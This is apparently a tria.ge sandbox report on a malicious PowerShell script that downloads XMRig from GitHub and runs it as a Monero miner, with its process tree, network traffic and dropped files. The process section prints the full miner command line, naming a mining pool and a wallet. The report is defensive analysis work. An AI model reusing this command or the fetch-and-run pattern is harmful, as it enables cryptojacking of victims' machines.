Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

windows.ps1

windows10-1703-x64

10

windows.ps1

windows10-2004-x64

10

windows.ps1

windows11-21h2-x64

10

Analysis

  • max time kernel
    362s
  • max time network
    1183s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    15/07/2024, 11:50 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    windows.ps1

  • Size

    421B

  • MD5

    d5684c541008779669644c15a23adaca

  • SHA1

    9250b10b96a788dcc595b998915fa4dd1de25332

  • SHA256

    e92cb9de85087f31c7d038e0c2b59c80e05f8c53d5bcc2a5ebf38f9da13b4f5e

  • SHA512

    2f7f6f89418cf93335154b3961362071dfa77b41858e09ce0745c8813c21748880a24a2388b771e8e7909e76902cd83cacdf89279617b335a068c8bbc40a4ef3

Score
10/10
xmrigexecutionminer

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1572
    • C:\Users\Admin\AppData\Local\Temp\xmrig\xmrig-6.21.3\xmrig.exe
      "C:\Users\Admin\AppData\Local\Temp\xmrig\xmrig-6.21.3\xmrig.exe" -a rx/0 -o gulf.moneroocean.stream:10001 -u 47T6dQJWm8NARismX3UU1XNkUmi83FFdW7EWfszvkxk1WANdBBJpFHh4jK58MjyLd1UsLRRGsWDCBfVtkrEukhbM6gN9LPY -p Windows --cpu-priority 5
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:1580

Network

  • flag-us
    DNS
    github.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    20.26.156.215
  • flag-gb
    GET
    https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip
    powershell.exe
    Remote address:
    20.26.156.215:443
    Request
    GET /xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
    Host: github.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Mon, 15 Jul 2024 12:41:55 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/5920120d-85b0-429b-879d-dbd3da8d03b2?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240715%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240715T124155Z&X-Amz-Expires=300&X-Amz-Signature=fe01344fe8201337fe28e14b20159fab276e5057456ff98c5f385a9d964dbefd&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.3-msvc-win64.zip&response-content-type=application%2Foctet-stream
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
    Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
    Content-Length: 0
    X-GitHub-Request-Id: C26B:1C38C4:1659B78:1965F03:6695191F
  • flag-us
    DNS
    objects.githubusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    objects.githubusercontent.com
    IN A
    Response
    objects.githubusercontent.com
    IN A
    185.199.111.133
    objects.githubusercontent.com
    IN A
    185.199.108.133
    objects.githubusercontent.com
    IN A
    185.199.110.133
    objects.githubusercontent.com
    IN A
    185.199.109.133
  • flag-us
    GET
    https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/5920120d-85b0-429b-879d-dbd3da8d03b2?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240715%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240715T124155Z&X-Amz-Expires=300&X-Amz-Signature=fe01344fe8201337fe28e14b20159fab276e5057456ff98c5f385a9d964dbefd&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.3-msvc-win64.zip&response-content-type=application%2Foctet-stream
    powershell.exe
    Remote address:
    185.199.111.133:443
    Request
    GET /github-production-release-asset-2e65be/88327406/5920120d-85b0-429b-879d-dbd3da8d03b2?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240715%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240715T124155Z&X-Amz-Expires=300&X-Amz-Signature=fe01344fe8201337fe28e14b20159fab276e5057456ff98c5f385a9d964dbefd&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.3-msvc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
    Host: objects.githubusercontent.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 2652511
    Content-Type: application/octet-stream
    Last-Modified: Tue, 23 Apr 2024 09:49:52 GMT
    ETag: "0x8DC637AB97DF0E9"
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f39f584d-601e-002c-1563-950dfa000000
    x-ms-version: 2020-10-02
    x-ms-creation-time: Tue, 23 Apr 2024 09:49:52 GMT
    x-ms-lease-status: unlocked
    x-ms-lease-state: available
    x-ms-blob-type: BlockBlob
    Content-Disposition: attachment; filename=xmrig-6.21.3-msvc-win64.zip
    x-ms-server-encrypted: true
    Via: 1.1 varnish, 1.1 varnish
    Accept-Ranges: bytes
    Date: Mon, 15 Jul 2024 12:42:08 GMT
    Age: 3974
    X-Served-By: cache-iad-kiad7000055-IAD, cache-lcy-eglc8600081-LCY
    X-Cache: HIT, HIT
    X-Cache-Hits: 2633, 1
    X-Timer: S1721047328.458339,VS0,VE311
  • flag-us
    DNS
    215.156.26.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    215.156.26.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.111.199.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.111.199.185.in-addr.arpa
    IN PTR
    Response
    133.111.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-111-133githubcom
  • flag-us
    DNS
    gulf.moneroocean.stream
    xmrig.exe
    Remote address:
    8.8.8.8:53
    Request
    gulf.moneroocean.stream
    IN A
    Response
    gulf.moneroocean.stream
    IN CNAME
    monerooceans.stream
    monerooceans.stream
    IN A
    149.102.143.109
  • flag-us
    DNS
    109.143.102.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    109.143.102.149.in-addr.arpa
    IN PTR
    Response
    109.143.102.149.in-addr.arpa
    IN PTR
    vmi1690904 contaboservernet
  • flag-us
    DNS
    14.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    104.116.69.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.116.69.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    73.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.144.22.2.in-addr.arpa
    IN PTR
    Response
    73.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-73deploystaticakamaitechnologiescom
  • 2.21.189.164:80
    http
    751 B
     6
  • 2.17.107.203:80
    138 B
     3
  • 20.26.156.215:443
    https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip
    tls, http
    powershell.exe
    999 B
     8.0kB
     11
    11

    HTTP Request

    GET https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

    HTTP Response

    302
  • 185.199.111.133:443
    https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/5920120d-85b0-429b-879d-dbd3da8d03b2?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240715%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240715T124155Z&X-Amz-Expires=300&X-Amz-Signature=fe01344fe8201337fe28e14b20159fab276e5057456ff98c5f385a9d964dbefd&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.3-msvc-win64.zip&response-content-type=application%2Foctet-stream
    tls, http
    powershell.exe
    76.5kB
     2.7MB
     1320
    1989

    HTTP Request

    GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/5920120d-85b0-429b-879d-dbd3da8d03b2?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240715%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240715T124155Z&X-Amz-Expires=300&X-Amz-Signature=fe01344fe8201337fe28e14b20159fab276e5057456ff98c5f385a9d964dbefd&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.3-msvc-win64.zip&response-content-type=application%2Foctet-stream

    HTTP Response

    200
  • 149.102.143.109:10001
    gulf.moneroocean.stream
    xmrig.exe
    14.4kB
     26.4kB
     136
    135
  • 8.8.8.8:53
    github.com
    dns
    powershell.exe
    56 B
     72 B
     1
    1

    DNS Request

    github.com

    DNS Response

    20.26.156.215

  • 8.8.8.8:53
    objects.githubusercontent.com
    dns
    powershell.exe
    75 B
     139 B
     1
    1

    DNS Request

    objects.githubusercontent.com

    DNS Response

    185.199.111.133
    185.199.108.133
    185.199.110.133
    185.199.109.133

  • 8.8.8.8:53
    215.156.26.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    215.156.26.20.in-addr.arpa

  • 8.8.8.8:53
    133.111.199.185.in-addr.arpa
    dns
    74 B
     118 B
     1
    1

    DNS Request

    133.111.199.185.in-addr.arpa

  • 8.8.8.8:53
    gulf.moneroocean.stream
    dns
    xmrig.exe
    69 B
     112 B
     1
    1

    DNS Request

    gulf.moneroocean.stream

    DNS Response

    149.102.143.109

  • 8.8.8.8:53
    109.143.102.149.in-addr.arpa
    dns
    74 B
     116 B
     1
    1

    DNS Request

    109.143.102.149.in-addr.arpa

  • 8.8.8.8:53
    14.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    14.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    104.116.69.13.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    104.116.69.13.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    73.144.22.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    73.144.22.2.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pjs4cqst.rsb.ps1
    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\xmrig\xmrig-6.21.3\xmrig.exe
    Filesize

    6.1MB

    MD5

    c0f8959614ae06561216158d78a787e5

    SHA1

    73167d1fd0cee1c96a6505606d21cbfe4369eb00

    SHA256

    e199d88569fb54346d5fa20ee7b59b2ea6f16f4ecca3ea1e1c937b11aab7b2b0

    SHA512

    a24fcf344d08c64ac301d5e4979f062b5e28e8e4acf1d2790916149ffe7726b0c4a11e0775aeba6b841d2d5081e1bd13e2b80390bf9bfbc44d67e54ec07cd746

    Download Submit

  • memory/1572-61-0x000001999D510000-0x000001999D51A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1572-5-0x000001999D380000-0x000001999D3A2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1572-10-0x00007FFF16C50000-0x00007FFF1763C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1572-8-0x00007FFF16C50000-0x00007FFF1763C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1572-25-0x00007FFF16C50000-0x00007FFF1763C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1572-48-0x000001999D5B0000-0x000001999D5C2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/1572-0-0x00007FFF16C53000-0x00007FFF16C54000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1572-9-0x000001999D530000-0x000001999D5A6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/1572-91-0x00007FFF16C50000-0x00007FFF1763C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1572-90-0x00007FFF16C53000-0x00007FFF16C54000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1580-89-0x0000021E73220000-0x0000021E73260000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1580-88-0x0000021E717F0000-0x0000021E71810000-memory.dmp

    Filesize

    128KB

    Download

  • memory/1580-93-0x0000021E73260000-0x0000021E73280000-memory.dmp

    Filesize

    128KB

    Download

  • memory/1580-92-0x0000021E731E0000-0x0000021E73200000-memory.dmp

    Filesize

    128KB

    Download

  • memory/1580-94-0x0000021E731E0000-0x0000021E73200000-memory.dmp

    Filesize

    128KB

    Download

  • memory/1580-95-0x0000021E73260000-0x0000021E73280000-memory.dmp

    Filesize

    128KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.